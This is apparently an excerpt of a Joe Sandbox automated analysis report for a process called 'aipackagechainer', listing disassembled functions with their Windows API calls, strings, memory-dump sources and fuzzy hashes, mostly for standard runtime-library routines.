API String ID: 575076100-1035257212
Opcode ID: deae88dce9ee8b8f4959b134a7265b15cfaaa12abb75480793842261478486c1
Instruction ID: 2f76cd5d042bf6d9bf62cc3d51247e21217319a7de456aebef8b170561380b19
Opcode Fuzzy Hash: deae88dce9ee8b8f4959b134a7265b15cfaaa12abb75480793842261478486c1
Instruction Fuzzy Hash: FD12BB70900249DFDB24DFA8CC45BEEBBB0FF48324F204269E525A7691EB746A85CF50

Function 000A48F0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

p2Wu3Wu, xrefs: 000A4AD1, 000A4BC2
2Wup1Wu, xrefs: 000A4AA9

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FileFindFirstHeapProcess
String ID: 2Wup1Wu$p2Wu3Wu
API String ID: 284326027-4124002120
Opcode ID: 0e85fbbbc8726a4661be4ba9e687bc46593c4a0b36efc5dd216fa28642e20c46
Instruction ID: 7a6b469ac317adbd0ea06c8d8c440644bb1cf6fb803598687e62f631f99f5a80
Opcode Fuzzy Hash: 0e85fbbbc8726a4661be4ba9e687bc46593c4a0b36efc5dd216fa28642e20c46
Instruction Fuzzy Hash: 8C81B175901218DFDB60DF68CC89B99B7F8EF45314F1482D9E418AB292DBB09E84CF91

Function 000E83A9 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 000E858D

Strings

1#SNAN, xrefs: 000E84B5
1#QNAN, xrefs: 000E84BC
1#IND, xrefs: 000E84AE
1#INF, xrefs: 000E84DF

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d77ab0fea438f151971fe4252e74f8fefa21118e845f28839a4792a4133b78a6
Instruction ID: 5646a8e54dcb83f301e7bd6e572537d6e14386a99b7dcef77febb02b8c946df2
Opcode Fuzzy Hash: d77ab0fea438f151971fe4252e74f8fefa21118e845f28839a4792a4133b78a6
Instruction Fuzzy Hash: D9D23672E086698FDB65CE29CD40BEAB7B5EB44304F1445EAD44DF7240EB78AE818F41

Function 000CA36E Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,000CA28A,00000000,?,000CA422), ref: 000CA370
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,000CA422), ref: 000CA397
HeapAlloc.KERNEL32(00000000,?,000CA422), ref: 000CA39E
InitializeSListHead.KERNEL32(00000000,?,000CA422), ref: 000CA3AB
GetProcessHeap.KERNEL32(00000000,00000000,?,000CA422), ref: 000CA3C0
HeapFree.KERNEL32(00000000,?,000CA422), ref: 000CA3C7

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: fb4ef0fbda811add0d8f34199b43ebd48a031aaf23a4b3a401f15f9912fae552
Instruction ID: ca4d7aeb261677274848e5523a902b2b165ec80e3a11d1e4b7dddf117855621b
Opcode Fuzzy Hash: fb4ef0fbda811add0d8f34199b43ebd48a031aaf23a4b3a401f15f9912fae552
Instruction Fuzzy Hash: 76F04F317002819BFB619F79EC18F2A77E9AB85756F00052DFA42D3660EE748581DB52

Function 000619C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 202fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,D11C52E5,00000000), ref: 00061AB3
FindClose.KERNEL32(000000FF,?), ref: 00061C72

Strings

p2Wu3Wu, xrefs: 00061C13
2Wup1Wu, xrefs: 00061AB3

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 2Wup1Wu$p2Wu3Wu
API String ID: 2295610775-4124002120
Opcode ID: f03c45361ff97a3acae522036262f2bdad737e9ba1b0d716a6bb555ba45ba5b6
Instruction ID: be6bf0fc86bfac6e4b3db298b8b59f9176a66cf51826abc9f34953f0b40252c0
Opcode Fuzzy Hash: f03c45361ff97a3acae522036262f2bdad737e9ba1b0d716a6bb555ba45ba5b6
Instruction Fuzzy Hash: A481AE70D01259DFDB24DFA8C999BEEB7B5FF04300F648299E415A7291EB706E84CB90

Function 000E705A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,000E7378,00000002,00000000,?,?,?,000E7378,?,00000000), ref: 000E70F3
GetLocaleInfoW.KERNEL32(?,20001004,000E7378,00000002,00000000,?,?,?,000E7378,?,00000000), ref: 000E711C
GetACP.KERNEL32(?,?,000E7378,?,00000000), ref: 000E7131

Strings

ACP, xrefs: 000E7078
OCP, xrefs: 000E70AE

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 51d37c046fee621d6e6d8d336ef9a0a6d9709eef14998a5426638577615fc506
Instruction ID: acad85dffd185d3e2c3d8f28c36ab563f0a34b844fea34826a8cc75b9d6a0e97
Opcode Fuzzy Hash: 51d37c046fee621d6e6d8d336ef9a0a6d9709eef14998a5426638577615fc506
Instruction Fuzzy Hash: 9321A432608381EEEB758B6ACD04AA773E6BB50B50B568464E90EF7114E732DD41D350

Function 000E722F Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 000E733B
IsValidCodePage.KERNEL32(00000000), ref: 000E7384
IsValidLocale.KERNEL32(?,00000001), ref: 000E7393
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 000E73DB
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 000E73FA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 319bafa9c1602b48a1dc78a29a28e9c4e81ac529e7390df2c098680ad15baf4c
Instruction ID: bf42435306bc80d56ea57f9eefeb5a158a4a26b9374be786dade32ce1403daec
Opcode Fuzzy Hash: 319bafa9c1602b48a1dc78a29a28e9c4e81ac529e7390df2c098680ad15baf4c
Instruction Fuzzy Hash: 3D517D71A04246AFEB60DFA6CC41EBEB7B8BF18700F184469B918F7191E7709A449B60

Function 000E68CB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

GetACP.KERNEL32(?,?,?,?,?,?,000DBEC3,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000E698C
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,000DBEC3,?,?,?,00000055,?,-00000050,?,?), ref: 000E69B7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 000E6B1A

Strings

utf8, xrefs: 000E6A89

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: b6df40bdbe885fd90201e308d666ebd7e96b9a25cfe094d515692ca5fc3fc047
Instruction ID: 8cad41c302784215fb3be843610d6f04ce5f94ab77ace2f6d3526003cdea6b38
Opcode Fuzzy Hash: b6df40bdbe885fd90201e308d666ebd7e96b9a25cfe094d515692ca5fc3fc047
Instruction Fuzzy Hash: 7F71E771A00342AED724AB76EC46BBA73EDEF64780F14443AF505F7182EB72E940C661

Function 000A4CC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 000A4D56
FindClose.KERNEL32(00000000), ref: 000A4EA1

Strings

2Wup1Wu, xrefs: 000A4D56
%d.%d.%d.%d, xrefs: 000A4E33

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 2Wup1Wu$%d.%d.%d.%d
API String ID: 2295610775-1593205671
Opcode ID: 75c3e94e655db7128b659b70eeab9b6c9ff9cd0d4bb49021303e5080268f0ca7
Instruction ID: fe171f5c110df980170155366a4f4944da8aae096d6de745ba72bb542ebffad5
Opcode Fuzzy Hash: 75c3e94e655db7128b659b70eeab9b6c9ff9cd0d4bb49021303e5080268f0ca7
Instruction Fuzzy Hash: 91618A71905219EFDF60DF68CC48B9DBBB4EF45314F108299E818AB292DB759E84CF90

Function 000A5D40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000A5E1A

Strings

\, xrefs: 000A5D9C
\, xrefs: 000A5D94
\, xrefs: 000A5DBE

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: DiskFreeSpace
String ID: \$\$\
API String ID: 1705453755-3791832595
Opcode ID: 68190a349c911ad6764b29064c0b0bf5cc66e2495aa18fb995b4b47dfc258bf9
Instruction ID: 87f5026da978adc84b511294992c15f906db2f7f95ed9f1eef859457b8c50d6d
Opcode Fuzzy Hash: 68190a349c911ad6764b29064c0b0bf5cc66e2495aa18fb995b4b47dfc258bf9
Instruction Fuzzy Hash: DC41D172A00611CBCB74DFA48844AABB3F4FF9A355F154A2EE8D897040F3318E8482C6

Function 000DE660 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000DE6ED

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 8ca64c449092e6b0a1a4d2b37ba288081dd802d3c6ee4d8efc7f340604143337
Instruction ID: 0c68cae9d6eb67dd5592d7fa74d33196fa64263bcd7251571018fdd081404694
Opcode Fuzzy Hash: 8ca64c449092e6b0a1a4d2b37ba288081dd802d3c6ee4d8efc7f340604143337
Instruction Fuzzy Hash: 23B112329053859FDB25AF68C891BEEBBE5EF59350F14816BE804AF342D6359D01CBB0

Function 000CD34D Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000CD359
IsDebuggerPresent.KERNEL32 ref: 000CD425
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000CD445
UnhandledExceptionFilter.KERNEL32(?), ref: 000CD44F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3000e999edaeeb760efee37607261f45f73c13ea49cfde3c6333f44f0feb83c8
Instruction ID: 1e3f05f0d6d86b9929c1a5d90f08a479892d538887f199010ce23540a2f4a747
Opcode Fuzzy Hash: 3000e999edaeeb760efee37607261f45f73c13ea49cfde3c6333f44f0feb83c8
Instruction Fuzzy Hash: 09312975D052189BEB60DFA4D989BCDBBF8BF08304F1041AAE40DAB250EB749A85DF45

Function 0009CE70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,?,0000000C,000F70DD,000000FF), ref: 0009CEFB
FindClose.KERNEL32(00000000,?,0000000C,000F70DD,000000FF), ref: 0009CF3F

Strings

2Wup1Wu, xrefs: 0009CEFB

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 2Wup1Wu
API String ID: 2295610775-403849135
Opcode ID: ab7d73fa367c02134e3b959fa861cd931f991dd650cf698c370b8035ffb3280e
Instruction ID: 0d947821288de2475bda424314628ffcd596b61e3f4259dc3d9a2510b255b6f6
Opcode Fuzzy Hash: ab7d73fa367c02134e3b959fa861cd931f991dd650cf698c370b8035ffb3280e
Instruction Fuzzy Hash: 8341A030904649DFDF20DF68C958BEEBBF5EF45314F148269E825AB291D7349A04DB90

Function 000AED70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

GetLocaleInfoW.KERNEL32(?,00000002,0010C418,00000000,?,00000000), ref: 000AEDE1
GetLocaleInfoW.KERNEL32(?,00000002,00000015,?,00000078,-00000001,?,00000002,0010C418,00000000,?,00000000), ref: 000AEE1D

Strings

%d-%s, xrefs: 000AEE27

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale$HeapProcess
String ID: %d-%s
API String ID: 3246605784-1781338863
Opcode ID: df63abd8d9ab79f1553e6dc28f6bcc0545c98aaff8da6930c09860b583082d23
Instruction ID: f86bdc6c826788a51a2834bf02cd6b9181f798a9d1baa2f1251eaa74953df1bc
Opcode Fuzzy Hash: df63abd8d9ab79f1553e6dc28f6bcc0545c98aaff8da6930c09860b583082d23
Instruction Fuzzy Hash: 7531ABB1A00649AFD710DF98CC49BAEFBB8FF45714F108269F515AB2D2DBB55900CB90

Function 00085E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,D11C52E5,?,00000000,00000000,00000000,000F25FD,000000FF), ref: 00085E68
FindClose.KERNEL32(00000000,?,D11C52E5,?,00000000,00000000,00000000,000F25FD,000000FF), ref: 00085EB2

Strings

2Wup1Wu, xrefs: 00085E68

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 2Wup1Wu
API String ID: 2295610775-403849135
Opcode ID: 2c8cbccd009f9f83b89a523a5c3a7033f446e90656c53f9eedcc0c252fff06fb
Instruction ID: 02ac69a22440842ad1acf26ee3b9f35d21e5ec5f837f7d9cc3f13a550e48c2ef
Opcode Fuzzy Hash: 2c8cbccd009f9f83b89a523a5c3a7033f446e90656c53f9eedcc0c252fff06fb
Instruction Fuzzy Hash: 5221B072900948DFD720EF68CD49BEEB7B8FF44721F104269E825A72D0DB745A08CB90

Function 000CA05B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0007E9D0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,D11C52E5,?,Function_0008BD60,000000FF), ref: 0007E9F7
Part of subcall function 0007E9D0: GetLastError.KERNEL32(?,00000000,00000000,D11C52E5,?,Function_0008BD60,000000FF), ref: 0007EA01

IsDebuggerPresent.KERNEL32(?,?,?,000616CF), ref: 000CA08E
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000616CF), ref: 000CA09D

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000CA098

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 67216c4e02c8db985dad789767ac2bbd6323cfcdd8c64057419adffa91da5af4
Instruction ID: 3be3d4e044550b1b6b1051149fb2c8094a69f588fd68f1bf6575dddb41df5aa8
Opcode Fuzzy Hash: 67216c4e02c8db985dad789767ac2bbd6323cfcdd8c64057419adffa91da5af4
Instruction Fuzzy Hash: 9DE022B03017908FE3709F38E80479A7BE0AF04748F00881DE846C2A51EBB8E844DB53

Function 000E6CDE Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 000DD2E9: GetLastError.KERNEL32(?,001273F0,000D91CE,?,?,000D937D,?,?,00000000,?,?,?,00000003,000D1672,?,000D15E1), ref: 000DD2ED
Part of subcall function 000DD2E9: SetLastError.KERNEL32(00000000,?,000D17F0,?,?,?,?,?,00000000,?,?,?,000DB1A9,00123A20,0000000C,000DB467), ref: 000DD38F

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6D32
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6D7C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000E6E42

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 771d1ccfb765da62dfbf91cbcb6e8538fd89a8d7b2c61b229706c04ac10a5538
Instruction ID: d9f96490251c88077641febd01b7f26555e67b20e034f53597e87b6ea0cd43ce
Opcode Fuzzy Hash: 771d1ccfb765da62dfbf91cbcb6e8538fd89a8d7b2c61b229706c04ac10a5538
Instruction Fuzzy Hash: 8661C371900247DFDB689F26EC92BBAB7E8EF14340F10407AED05E6282EB35D990DB50

Function 000616C0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 000C6C68
GetVersionExW.KERNEL32(?), ref: 000C6CB3
IsProcessorFeaturePresent.KERNEL32(00000011), ref: 000C6CC7

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Version$FeaturePresentProcessor
String ID:
API String ID: 1871528217-0
Opcode ID: e523b046770c2a562e4ebe38e7b0470136c0e0fc230d1963be347a511f065e4a
Instruction ID: 1e7570f95ff46e8623886ec02e7f21dca296e9daa2f715969da30564fdf29f9d
Opcode Fuzzy Hash: e523b046770c2a562e4ebe38e7b0470136c0e0fc230d1963be347a511f065e4a
Instruction Fuzzy Hash: 62613832B142244BE318CF29CCD5AAFBBD5EBC9345F04463EE486C7291D6B9C955CBA0

Function 000D1673 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000D176B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000D1775
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 000D1782

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 4fbbe103d8695f570f4922be7d0a42f6fbc4010ae9fffe1187245206f54dd44f
Instruction ID: 19a7f57f004f1563b2ad39aefef1f7a82dbb413d267422c87e9e68d4c6fb1dab
